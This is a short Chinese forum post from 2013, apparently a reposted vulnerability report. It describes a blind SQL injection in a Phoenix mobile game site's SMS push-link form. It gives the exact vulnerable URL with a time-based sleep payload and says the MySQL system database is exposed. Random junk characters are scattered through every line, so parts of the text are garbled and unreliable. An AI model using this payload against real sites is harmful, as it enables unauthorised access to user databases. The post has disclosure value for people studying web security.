简要描述:" [/ n. w6 x0 t! S8 n# s0 k
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。& ? D3 @ o- E! g+ o! F
0 j. `( m) Q X8 D6 q: ~
详细说明:
C/ T$ V' L5 k4 D6 f存在SQL盲注url:$ y _ h \8 @- a8 N' ^1 j
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=15 M0 p$ X; i7 |: p, T$ J# R
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
; f. N4 y9 L9 d U nhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png) W" D( p+ H0 H& r
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
7 E9 \& L J5 x+ B6 `
0 c/ N) l+ N% H$ r# v* m能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对